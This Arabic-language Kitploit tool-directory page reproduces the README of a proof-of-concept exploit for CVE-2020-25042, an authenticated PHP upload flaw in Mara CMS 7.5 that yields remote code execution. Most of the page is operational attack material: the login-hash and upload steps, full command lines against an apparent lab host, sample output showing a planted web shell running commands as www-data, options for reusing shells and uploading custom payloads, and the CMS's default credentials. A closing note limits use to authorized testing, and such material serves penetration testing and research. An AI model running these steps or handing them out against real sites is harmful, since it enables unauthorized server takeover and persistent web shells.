Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-25042-PoC — PoC لثغرة CVE-2020-25042: أتمتة رفع PHP مُصادَق عليه في Mara CMS 7.5 للوصول إلى RCE، مع معالجة هاش تسجيل الدخول، وإعادة استخدام الصدفة، ودعم الحمولات المخصصة، ومخرجات CLI نظيفة. | Kitploit
أدوات/GitHubGitHub/groppoxx/cve-2020-25042-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubgroppoxx/cve-2020-25042-poc

CVE-2020-25042-PoC

PoC لثغرة CVE-2020-25042: أتمتة رفع PHP مُصادَق عليه في Mara CMS 7.5 للوصول إلى RCE، مع معالجة هاش تسجيل الدخول، وإعادة استخدام الصدفة، ودعم الحمولات المخصصة، ومخرجات CLI نظيفة.

عرض المستودع
5منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-25042-PoC

إثبات مفهوم لـ CVE-2020-25042، وهي مشكلة رفع ملفات اعتباطية تتطلب مصادقة في Mara CMS 7.5 يمكن أن تؤدي إلى تنفيذ تعليمات برمجية عن بُعد.

يقوم السكربت بتسجيل الدخول باستخدام حساب مسؤول/مدير صالح في Mara CMS، ويرفع حمولة PHP عبر codebase/handler.php، وينفّذ الأوامر من خلال الملف المرفوع.

كما يعيد استخدام قشرة (shell) موجودة مسبقًا عندما يكون ذلك ممكنًا، بحيث لا تنشئ ملف PHP جديدًا في كل تشغيل.

ما الذي يفعله

  1. يتحقق مما إذا كانت القشرة المتوقعة موجودة بالفعل وقابلة لإعادة الاستخدام.
  2. إذا كانت قابلة لإعادة الاستخدام، ينفّذ الأمر مباشرة.
  3. إذا لم تكن قابلة لإعادة الاستخدام، يحمّل صفحة CMS ويستخرج shash.
  4. يطلب ملح تسجيل الدخول باستخدام إجراء setsalt.
  5. يحسب تجزئات تسجيل الدخول في Mara CMS.
  6. يوثّق الدخول كمستخدم صالح.
  7. يفتح عملية الرفع عند codebase/dir.php?type=filenew.
  8. يرفع حمولة أوامر PHP عبر codebase/handler.php.
  9. ينفّذ --cmd من خلال القشرة المرفوعة.

المتطلبات

root@kitploit:~
Python 3.8+

pip install -r requirements.txt

حزم Python المطلوبة:

root@kitploit:~
requests
urllib3

بدء سريع

القيم الموضوعة بين أقواس زاوية هي عناصر نائبة. استبدلها بقيمك الخاصة ولا تُدرج حرفي < أو >.

root@kitploit:~
python3 cve_2020_25042.py \
  --url <MARA_CMS_URL> \
  --username <USERNAME> \
  --password '<PASSWORD>' \
  --cmd whoami

العناصر النائبة

root@kitploit:~
<MARA_CMS_URL>  # Target Mara CMS base URL. Example: http://target/cms
<USERNAME>      # Valid Mara CMS admin/manager username.
<PASSWORD>      # Valid Mara CMS admin/manager password.

مثال كامل

root@kitploit:~
python3 cve_2020_25042.py \
  --url http://10.129.96.20/cms \
  --username admin \
  --password changeme \
  --cmd whoami

مثال على المخرجات:

root@kitploit:~
[2026-05-17T23:32:31Z] [*] Checking existing shell: http://10.129.96.20/cms/img/mara-poc.php
[2026-05-17T23:32:31Z] [*] Loading Mara CMS page and collecting session data
[2026-05-17T23:32:31Z] [+] Found shash: 9552
[2026-05-17T23:32:31Z] [*] Requesting login salt
[2026-05-17T23:32:31Z] [+] Got salt: 4253
[2026-05-17T23:32:31Z] [*] Logging in as admin
[2026-05-17T23:32:31Z] [+] Login successful: OK:5
[2026-05-17T23:32:31Z] [*] Opening upload form
[2026-05-17T23:32:32Z] [*] Uploading PHP payload as mara-poc.php
[2026-05-17T23:32:32Z] [+] Upload request completed
[2026-05-17T23:32:32Z] [+] Shell URL: http://10.129.96.20/cms/img/mara-poc.php
[2026-05-17T23:32:32Z] [*] Executing command: whoami

[+] Command output
MARA_CVE_2020_25042_OK
www-data

إعادة استخدام قشرة موجودة

افتراضيًا، يستخدم السكربت اسم قشرة ثابتًا:

root@kitploit:~
mara-poc.php

في التشغيل التالي، يتحقق من:

root@kitploit:~
http://target/cms/img/mara-poc.php

إذا استجابت القشرة بالعلامة المتوقعة، يتخطى السكربت تسجيل الدخول والرفع:

root@kitploit:~
python3 cve_2020_25042.py \
  --url http://10.129.96.20/cms \
  --cmd "ls -la"

لإعادة استخدام قشرة أُنشئت سابقًا باسم عشوائي:

root@kitploit:~
python3 cve_2020_25042.py \
  --url http://10.129.96.20/cms \
  --shell-name mara-poc-jxfizldy.php \
  --cmd whoami

يمكنك أيضًا تمرير مسار القشرة المكشوف مباشرة:

root@kitploit:~
python3 cve_2020_25042.py \
  --url http://10.129.96.20/cms \
  --shell-url-path /cms/img/mara-poc-jxfizldy.php \
  --cmd "ls -la"

الرفع فقط

ارفع الحمولة دون تنفيذ أمر:

root@kitploit:~
python3 cve_2020_25042.py \
  --url http://10.129.96.20/cms \
  --username admin \
  --password changeme \
  --upload-only

الخيارات الاختيارية

root@kitploit:~
--page <PAGE>
   Existing CMS page used to bootstrap login and extract shash. Default: lorem.php

--shell-name <NAME>
   PHP filename to upload or reuse. Default: mara-poc.php

--shell-url-path <PATH_OR_URL>
   Explicit shell path or URL to reuse.
   Example: /cms/img/mara-poc.php

--payload-file <FILE>
   Upload a custom PHP payload instead of the default ?cmd= shell.

--destdir <DIR>
   Raw destdir value sent in the upload form. Default leaves Mara CMS using img/.

--force-upload
   Always login and upload, even if a reusable shell already exists.

--upload-only
   Upload the payload but do not execute --cmd.

--only-final
   Hide progress logs and print only command output.

--no-color
   Disable ANSI colors.

--debug
   Print request URLs and short handler response snippets.

ملاحظات

  • يتطلب الاستغلال جلسة مسؤول أو مدير صالحة وموثّقة في Mara CMS.
  • قد تكون بيانات اعتماد Mara CMS الافتراضية admin:changeme في التثبيتات الاختبارية غير المعدّلة.
  • تطبع الحمولة الافتراضية MARA_CVE_2020_25042_OK قبل مخرجات الأمر.
  • موقع الرفع الافتراضي الملاحَظ في Mara CMS 7.5 هو img/.
  • استخدم إعادة استخدام القشرة كلما أمكن لتجنب ترك العديد من ملفات PHP على الهدف.
  • استخدم --force-upload فقط عندما تحتاج إلى استبدال الحمولة أو إعادة إنشائها.

قانوني

إثبات المفهوم هذا مخصص لـ اختبار الأمان المصرّح به، وبيئات المختبرات، والتحقق من الثغرات. لا تستخدمه ضد أنظمة دون إذن صريح.

تنزيل الأداة